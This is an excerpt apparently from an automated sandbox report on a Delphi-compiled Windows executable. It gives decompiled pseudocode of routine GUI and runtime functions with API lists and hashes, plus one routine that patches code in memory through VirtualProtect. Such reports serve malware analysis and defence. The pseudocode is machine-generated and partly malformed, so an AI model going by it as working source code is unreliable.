                                  				if(_a6 != 0) {
                                  					SetWindowLongA(_t22, 0xfffffffc, E00426074(_a4, _a8));
                                  				}
                                  				return _t22;
                                  			}

                                  APIs
                                  • GetClassInfoA.USER32(00400000,00426158,?), ref: 00426189
                                  • UnregisterClassA.USER32(00426158,00400000), ref: 004261B2
                                  • RegisterClassA.USER32(004A05D8), ref: 004261BC
                                  • SetWindowLongA.USER32 ref: 00426207
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                  • String ID: XaB
                                  • API String ID: 4025006896-2044386368
                                  • Opcode ID: addd4cdde9af605aa3d7e116b0b2e01a18b5a711a6425cb1734425e58631475e
                                  • Instruction ID: 0f285f785c3965065d0e6245446e0c2136b53e017d75c0c962aa98d95ef97112
                                  • Opcode Fuzzy Hash: addd4cdde9af605aa3d7e116b0b2e01a18b5a711a6425cb1734425e58631475e
                                  • Instruction Fuzzy Hash: BC016171B44100BBDB00EBA8ACC1F9A3B98A709304F508276F904E73D2C639A840CBBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E00401C34() {
                                  				intOrPtr* _v8;
                                  				void* _t17;
                                  				signed int _t19;
                                  				intOrPtr _t28;
                                  				void* _t29;
                                  				intOrPtr _t34;
                                  
                                  				_push(_t34);
                                  				_push(E00401CFC);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t34;
                                  				_push(0x4bc5cc);
                                  				L0040140C();
                                  				if( *0x4bc04d != 0) {
                                  					_push(0x4bc5cc);
                                  					L00401414();
                                  				}
                                  				E004014B0(0x4bc5ec);
                                  				E004014B0(0x4bc5fc);
                                  				E004014B0(0x4bc628);
                                  				_t17 = LocalAlloc(0, 0xff8); // executed
                                  				 *0x4bc624 = _t17;
                                  				if( *0x4bc624 != 0) {
                                  					_t19 = 3;
                                  					do {
                                  						_t29 =  *0x4bc624; // 0x262b80
                                  						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
                                  						_t19 = _t19 + 1;
                                  					} while (_t19 != 0x401);
                                  					_v8 = 0x4bc60c;
                                  					 *((intOrPtr*)(_v8 + 4)) = _v8;
                                  					 *_v8 = _v8;
                                  					 *0x4bc618 = _v8;
                                  					 *0x4bc5c4 = 1;
                                  				}
                                  				_pop(_t28);
                                  				 *[fs:eax] = _t28;
                                  				_push(E00401D03);
                                  				if( *0x4bc04d != 0) {
                                  					_push(0x4bc5cc);
                                  					L0040141C();
                                  					return 0;
                                  				}
                                  				return 0;
                                  			}










                                  APIs
                                  • RtlInitializeCriticalSection.KERNEL32(004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C4B
                                  • RtlEnterCriticalSection.KERNEL32(004BC5CC,004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C5E
                                  • LocalAlloc.KERNEL32(00000000,00000FF8,004BC5CC,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401C88
                                  • RtlLeaveCriticalSection.KERNEL32(004BC5CC,00401D03,00000000,00401CFC,?,00000000,?,0040265A,00000000), ref: 00401CF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                  • String ID: dA&
                                  • API String ID: 730355536-2347778391
                                  • Opcode ID: 4e82e0472d2ad88d837138ab471f0bd350aa74d59a910c41fdf11f543da87940
                                  • Instruction ID: 7ced40d00289cef8c72374ed276ec3ce5776550f776a390a69df997d010786a5
                                  • Opcode Fuzzy Hash: 4e82e0472d2ad88d837138ab471f0bd350aa74d59a910c41fdf11f543da87940
                                  • Instruction Fuzzy Hash: F5118F70648610AFE725EB69D9C5B6A7BE4EB88304F10817BF440A73F1C67CAD40CA6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00460154(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr* _v8;
                                  				int _t100;
                                  				int _t102;
                                  				intOrPtr _t119;
                                  				int _t124;
                                  				intOrPtr _t157;
                                  				signed char _t165;
                                  				signed char _t166;
                                  				void* _t168;
                                  				signed char _t183;
                                  				intOrPtr _t185;
                                  				intOrPtr _t197;
                                  				void* _t200;
                                  				void* _t202;
                                  				int _t203;
                                  				intOrPtr _t207;
                                  				void* _t209;
                                  				signed char _t210;
                                  
                                  				_t200 = __edi;
                                  				_t206 = _t207;
                                  				_t202 = __edx;
                                  				_v8 = __eax;
                                  				E00449E20(_v8);
                                  				_push(_t207);
                                  				_push(0x4603bc);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t207;
                                  				 *(_v8 + 0x268) = 0;
                                  				 *(_v8 + 0x26c) = 0;
                                  				 *(_v8 + 0x270) = 0;
                                  				_t168 = 0;
                                  				_t209 = E00403598( *_v8) -  *0x45cfc0; // 0x45d00c
                                  				if(_t209 == 0) {
                                  					_t165 =  *0x4bc665; // 0x0
                                  					_t166 = _t165 ^ 0x00000001;
                                  					_t210 = _t166;
                                  					 *(_v8 + 0x234) = _t166;
                                  				}
                                  				E0044957C(_v8, _t168, _t202, _t210); // executed
                                  				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                                  					L14:
                                  					_t100 =  *(_v8 + 0x268);
                                  					_t219 = _t100;
                                  					if(_t100 > 0) {
                                  						E00446760(_v8, _t100, _t200, _t219);
                                  					}
                                  					_t102 =  *(_v8 + 0x26c);
                                  					_t220 = _t102;
                                  					if(_t102 > 0) {
                                  						E004467A4(_v8, _t102, _t200, _t220);
                                  					}
                                  					_t183 =  *0x4603c8; // 0x0
                                  					 *(_v8 + 0x98) = _t183;
                                  					_t221 = _t168;
                                  					if(_t168 == 0) {
                                  						E0045F7B4(_v8, 1, 1);
                                  						E0044D054(_v8, 1, 1, _t221);
                                  					}
                                  					E00447F3C(_v8, 0, 0xb03d, 0);
                                  					_pop(_t185);
                                  					 *[fs:eax] = _t185;
                                  					_push(0x4603c3);
                                  					return E00449E28(_v8);
                                  				} else {
                                  					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                                  						_t197 =  *0x4bcb80; // 0x1c40e90
                                  						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t197 + 0x40))) {
                                  							_t157 =  *0x4bcb80; // 0x1c40e90
                                  							E00428678( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00428670( *((intOrPtr*)(_v8 + 0x68))),  *(_t157 + 0x40),  *(_v8 + 0x25c)), _t200, _t206);
                                  						}
                                  					}
                                  					_t119 =  *0x4bcb80; // 0x1c40e90
                                  					 *(_v8 + 0x25c) =  *(_t119 + 0x40);
                                  					_t203 = E004604EC(_v8);
                                  					_t124 =  *(_v8 + 0x270);
                                  					_t215 = _t203 - _t124;
                                  					if(_t203 != _t124) {
                                  						_t168 = 1;
                                  						E0045F7B4(_v8, _t124, _t203);
                                  						E0044D054(_v8,  *(_v8 + 0x270), _t203, _t215);
                                  						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                                  							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t203,  *(_v8 + 0x270));
                                  						}
                                  						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                                  							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t203,  *(_v8 + 0x270));
                                  						}
                                  						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                                  							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t203,  *(_v8 + 0x270));
                                  							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t203,  *(_v8 + 0x270));
                                  						}
                                  					}
                                  					goto L14;
                                  				}
                                  			}






















                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f640e6d0cf5c664c45284156540a415d032844f1db2cbfa75cbbfb1605bb14ca
                                  • Instruction ID: 6a55c8ea9dfba38a169bb315944962558cb9d6f58a87ed62a57e18c3e94021f4
                                  • Opcode Fuzzy Hash: f640e6d0cf5c664c45284156540a415d032844f1db2cbfa75cbbfb1605bb14ca
                                  • Instruction Fuzzy Hash: 0771E534A04104EFDB04DBA9C589EAEB7F5AF49304F2541F5E808DB362D735AE45DB44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00438864(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
                                  				char _v8;
                                  				int _t40;
                                  				CHAR* _t42;
                                  				int _t54;
                                  				CHAR* _t56;
                                  				int _t65;
                                  				CHAR* _t67;
                                  				intOrPtr* _t76;
                                  				intOrPtr _t86;
                                  				struct tagRECT* _t91;
                                  				signed int _t93;
                                  				int _t94;
                                  				intOrPtr _t97;
                                  				signed int _t104;
                                  
                                  				_push(0);
                                  				_t93 = __ecx;
                                  				_t91 = __edx;
                                  				_t76 = __eax;
                                  				_push(_t97);
                                  				_push(0x4389ba);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t97;
                                  				 *((intOrPtr*)( *__eax + 0x90))();
                                  				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
                                  					E004046A0( &_v8, 0x4389d0);
                                  				}
                                  				if( *((char*)(_t76 + 0x170)) == 0) {
                                  					_t104 = _t93;
                                  				}
                                  				_t94 = E00449070(_t76, _t93, _t104);
                                  				E004293D8( *((intOrPtr*)(_t76 + 0x160)));
                                  				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
                                  					_t40 = E00404698(_v8);
                                  					_t42 = E00404898(_v8);
                                  					DrawTextA(E004294DC( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94); // executed
                                  				} else {
                                  					OffsetRect(_t91, 1, 1);
                                  					E00428490( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000014);
                                  					_t54 = E00404698(_v8);
                                  					_t56 = E00404898(_v8);
                                  					DrawTextA(E004294DC( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
                                  					OffsetRect(_t91, 0xffffffff, 0xffffffff);
                                  					E00428490( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000010);
                                  					_t65 = E00404698(_v8);
                                  					_t67 = E00404898(_v8);
                                  					DrawTextA(E004294DC( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
                                  				}
                                  				_pop(_t86);
                                  				 *[fs:eax] = _t86;
                                  				_push(0x4389c1);
                                  				return E004043D8( &_v8);
                                  			}


















                                  APIs
                                  • OffsetRect.USER32 ref: 004388FE
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00438936
                                  • OffsetRect.USER32 ref: 00438940
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00438978
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0043899F
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: DrawText$OffsetRect
                                  • String ID:
                                  • API String ID: 1886049697-0
                                  • Opcode ID: d5d296c7d19f9f45e0ef83a316c6e3301e82849a25fdc707f22b2e1ed48eed5b
                                  • Instruction ID: 74dd78a86579deff2084849f8f1fd9dce51f18be79d7683dccd305a5bd4a35e2
                                  • Opcode Fuzzy Hash: d5d296c7d19f9f45e0ef83a316c6e3301e82849a25fdc707f22b2e1ed48eed5b
                                  • Instruction Fuzzy Hash: 48318670A04204AFDB11FB69CC85B9FB7E8AF49314F5540BAB808E7296CB7D9D049629
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0049E878(void* __eax, long __ecx, void* __edx) {
                                  				long _v16;
                                  				int _t3;
                                  				void* _t9;
                                  				void* _t15;
                                  				long _t16;
                                  				DWORD* _t17;
                                  
                                  				_push(__ecx);
                                  				_t16 = __ecx;
                                  				_t15 = __edx;
                                  				_t9 = __eax;
                                  				_t3 = VirtualProtect(__eax, __ecx, 0x40, _t17); // executed
                                  				if(_t3 != 0) {
                                  					0;
                                  					0;
                                  					0;
                                  					E00402D04(_t15, _t16, _t9);
                                  					FlushInstructionCache(GetCurrentProcess(), _t9, _t16);
                                  					_t3 = VirtualProtect(_t9, _t16, _v16, _t17);
                                  				}
                                  				return _t3;
                                  			}










                                  APIs
                                  • VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00000005,?,?,004BCDC0,0049E911), ref: 0049E888
                                  • GetCurrentProcess.KERNEL32(00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,004BCDC0,0049E911), ref: 0049E8AE
                                  • FlushInstructionCache.KERNEL32 ref: 0049E8B4
                                  • VirtualProtect.KERNEL32(00000000,00000005,000000E9,?,00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,004BCDC0,0049E911), ref: 0049E8C1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                  • String ID:
                                  • API String ID: 4115577372-0
                                  • Opcode ID: 849760c5000c0cbf7580439b16a1565490b3060bdeaf84e031cadab66409ab62
                                  • Instruction ID: d2ff559206eff8e6b84761999227fd00e5f6a7341208938c852852a44592174c
                                  • Opcode Fuzzy Hash: 849760c5000c0cbf7580439b16a1565490b3060bdeaf84e031cadab66409ab62
                                  • Instruction Fuzzy Hash: 21E0129130622036D524726B5D85D9B5E8DCED6774701543AB50AF3283C97DCC1140B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E0043DA44(void* __eax, void* __ebx, void* __ecx, void* __esi) {
                                  				char _v8;
                                  				int _t17;
                                  				intOrPtr _t18;
                                  				void* _t23;
                                  				void* _t24;
                                  				intOrPtr _t28;
                                  				int _t32;
                                  				intOrPtr _t35;
                                  
                                  				_t24 = __ecx;
                                  				_push(0);
                                  				_t23 = __eax;
                                  				_push(_t35);
                                  				_push(0x43dac3);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t35;
                                  				KillTimer( *(__eax + 0x34), 1);
                                  				_t32 =  *(_t23 + 0x30);
                                  				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0) {
                                  					_t17 = SetTimer( *(_t23 + 0x34), 1, _t32, 0); // executed
                                  					if(_t17 == 0) {
                                  						_t18 =  *0x4bb220; // 0x426454
                                  						E0040656C(_t18, _t24,  &_v8);
                                  						E0040CAC4(_v8, 1);
                                  						E00403DEC();
                                  					}
                                  				}
                                  				_pop(_t28);
                                  				 *[fs:eax] = _t28;
                                  				_push(0x43daca);
                                  				return E004043D8( &_v8);
                                  			}












                                  APIs
                                  • KillTimer.USER32 ref: 0043DA61
                                  • SetTimer.USER32(?,00000001,?,00000000), ref: 0043DA83
                                    • Part of subcall function 0040656C: LoadStringA.USER32 ref: 0040659E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Timer$KillLoadString
                                  • String ID: TdB
                                  • API String ID: 1423459280-230150497
                                  • Opcode ID: cc2accabe9787aadf79198a753a5bd9566ad5780803869af54555132eba7f4c2
                                  • Instruction ID: 62567be880da1182807cb4c6962a5b0457812c0d356ab9ad02987b2bec6cc087
                                  • Opcode Fuzzy Hash: cc2accabe9787aadf79198a753a5bd9566ad5780803869af54555132eba7f4c2
                                  • Instruction Fuzzy Hash: 7801B531A04204AFDB10FF65DD82B5637ACEB48B14F4110A6FD009B2D2D2B9AD40C658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0042FEAC(int _a4) {
                                  				void* __ebx;
                                  				void* __ebp;
                                  				signed int _t2;
                                  				signed int _t3;
                                  				void* _t7;
                                  				int _t8;
                                  				void* _t12;
                                  				void* _t13;
                                  				void* _t17;
                                  
                                  				_t8 = _a4;
                                  				if( *0x4bc92c == 0) {
                                  					 *0x4bc904 = E0042FDB8(0, _t8, "GetSystemMetrics",  *0x4bc904, _t17);
                                  					_t7 =  *0x4bc904(_t8); // executed
                                  					return _t7;
                                  				}
                                  				_t3 = _t2 | 0xffffffff;
                                  				_t12 = _t8 + 0xffffffb4 - 2;
                                  				__eflags = _t12;
                                  				if(__eflags < 0) {
                                  					_t3 = 0;
                                  				} else {
                                  					if(__eflags == 0) {
                                  						_t8 = 0;
                                  					} else {
                                  						_t13 = _t12 - 1;
                                  						__eflags = _t13;
                                  						if(_t13 == 0) {
                                  							_t8 = 1;
                                  						} else {
                                  							__eflags = _t13 - 0xffffffffffffffff;
                                  							if(_t13 - 0xffffffffffffffff < 0) {
                                  								_t3 = 1;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				__eflags = _t3 - 0xffffffff;
                                  				if(_t3 != 0xffffffff) {
                                  					return _t3;
                                  				} else {
                                  					return GetSystemMetrics(_t8);
                                  				}
                                  			}













                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0042FF0E
                                    • Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C
                                  • KiUserCallbackDispatcher.NTDLL ref: 0042FED4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                  • String ID: GetSystemMetrics
                                  • API String ID: 54681038-96882338
                                  • Opcode ID: 31b34adb3dd180f2973adf22d334e837596a601fc61411ebd5de6f19a5422a6e
                                  • Instruction ID: daf23ffb7eba0a7573a5df445ea76db764a797a6bf5cd916b578ff44d543b6d6
                                  • Opcode Fuzzy Hash: 31b34adb3dd180f2973adf22d334e837596a601fc61411ebd5de6f19a5422a6e
                                  • Instruction Fuzzy Hash: 65F096707251244BDB101A34BEC4A3735659787334FE2873BFA12866E9C57C984D921D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 45%
                                  			E0040D364(void* __eax, void* __ebx, void* __ecx) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v28;
                                  				void* _t27;
                                  				void* _t37;
                                  				intOrPtr _t43;
                                  				void* _t48;
                                  				void* _t49;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				void* _t59;
                                  				void* _t60;
                                  				intOrPtr _t61;
                                  
                                  				_t49 = __ecx;
                                  				_t59 = _t60;
                                  				_t61 = _t60 + 0xffffffe8;
                                  				_v12 = 0;
                                  				_push(_t59);
                                  				_push(0x40d43a);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t61;
                                  				_v8 = 0xffffffff;
                                  				_t55 = __eax;
                                  				E00404470( &_v12, __eax);
                                  				E004048E8( &_v12);
                                  				_push( &_v16);
                                  				_t27 = E00404898(_v12);
                                  				_push(_t27); // executed
                                  				L00406CE4(); // executed
                                  				_t48 = _t27;
                                  				if(_t48 == 0) {
                                  					_pop(_t56);
                                  					 *[fs:eax] = _t56;
                                  					_push(E0040D441);
                                  					return E004043D8( &_v12);
                                  				} else {
                                  					_v20 = E00402AE4(_t48, _t49, _t55);
                                  					_push(_t59);
                                  					_push(0x40d41d);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t61;
                                  					_push(_v20);
                                  					_push(_t48);
                                  					_push(_v16);
                                  					_t37 = E00404898(_v12);
                                  					_push(_t37); // executed
                                  					L00406CDC(); // executed
                                  					if(_t37 != 0) {
                                  						_push( &_v28);
                                  						_push( &_v24);
                                  						_push(E0040D44C);
                                  						_t43 = _v20;
                                  						_push(_t43);
                                  						L00406CEC();
                                  						if(_t43 != 0) {
                                  							_v8 =  *((intOrPtr*)(_v24 + 8));
                                  						}
                                  					}
                                  					_pop(_t57);
                                  					 *[fs:eax] = _t57;
                                  					_push(0x40d424);
                                  					return E00402B14(_v20);
                                  				}
                                  			}




















                                  APIs
                                  • 73211C9C.VERSION(00000000,?,00000000,0040D43A), ref: 0040D3A6
                                  • 73211CED.VERSION(00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3DB
                                  • 73211B72.VERSION(?,0040D44C,?,?,00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3F5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: 73211
                                  • String ID:
                                  • API String ID: 2278683314-0
                                  • Opcode ID: 60b0c64f81e096c9efbd4ab5870f46e5c527d8ad74a565125164eb61d3377cc9
                                  • Instruction ID: 0c1de86a5a6b2bd8f79132c246a7c769ae6bbc625a861bd60d69dd3460cca180
                                  • Opcode Fuzzy Hash: 60b0c64f81e096c9efbd4ab5870f46e5c527d8ad74a565125164eb61d3377cc9
                                  • Instruction Fuzzy Hash: 5A213CB5A04649AFDB10EFE5CC818AEB7FCEB48704B528476B500F36D1D738A905CA28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E0040D362(void* __eax, void* __ebx) {
                                  				intOrPtr _v8;
                                  				char _v12;
                                  				char _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				char _v28;
                                  				void* _t27;
                                  				void* _t37;
                                  				intOrPtr _t43;
                                  				void* _t48;
                                  				void* _t49;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				void* _t59;
                                  				void* _t60;
                                  				intOrPtr _t61;
                                  
                                  				_t59 = _t60;
                                  				_t61 = _t60 + 0xffffffe8;
                                  				_v12 = 0;
                                  				_push(_t59);
                                  				_push(0x40d43a);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t61;
                                  				_v8 = 0xffffffff;
                                  				_t55 = __eax;
                                  				E00404470( &_v12, __eax);
                                  				E004048E8( &_v12);
                                  				_push( &_v16);
                                  				_t27 = E00404898(_v12);
                                  				_push(_t27); // executed
                                  				L00406CE4(); // executed
                                  				_t48 = _t27;
                                  				if(_t48 == 0) {
                                  					_pop(_t56);
                                  					 *[fs:eax] = _t56;
                                  					_push(E0040D441);
                                  					return E004043D8( &_v12);
                                  				} else {
                                  					_v20 = E00402AE4(_t48, _t49, _t55);
                                  					_push(_t59);
                                  					_push(0x40d41d);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t61;
                                  					_push(_v20);
                                  					_push(_t48);
                                  					_push(_v16);
                                  					_t37 = E00404898(_v12);
                                  					_push(_t37); // executed
                                  					L00406CDC(); // executed
                                  					if(_t37 != 0) {
                                  						_push( &_v28);
                                  						_push( &_v24);
                                  						_push(E0040D44C);
                                  						_t43 = _v20;
                                  						_push(_t43);
                                  						L00406CEC();
                                  						if(_t43 != 0) {
                                  							_v8 =  *((intOrPtr*)(_v24 + 8));
                                  						}
                                  					}
                                  					_pop(_t57);
                                  					 *[fs:eax] = _t57;
                                  					_push(0x40d424);
                                  					return E00402B14(_v20);
                                  				}
                                  			}




















                                  APIs
                                  • 73211C9C.VERSION(00000000,?,00000000,0040D43A), ref: 0040D3A6
                                  • 73211CED.VERSION(00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3DB
                                  • 73211B72.VERSION(?,0040D44C,?,?,00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3F5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: 73211
                                  • String ID:
                                  • API String ID: 2278683314-0
                                  • Opcode ID: 3eaad187d96bd7d5f167e7e88763bfcd67d7a239c4cb7c580fa5eb38c7902c90
                                  • Instruction ID: 6db42e9633ccc2a9c0b1df817b43b5bc78e029d9501da108c8f717f333312730
                                  • Opcode Fuzzy Hash: 3eaad187d96bd7d5f167e7e88763bfcd67d7a239c4cb7c580fa5eb38c7902c90
                                  • Instruction Fuzzy Hash: A8210E75A00649ABDB10EFE5CC818AEB7FCEB48704B514476B510F3691D738E905CA28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
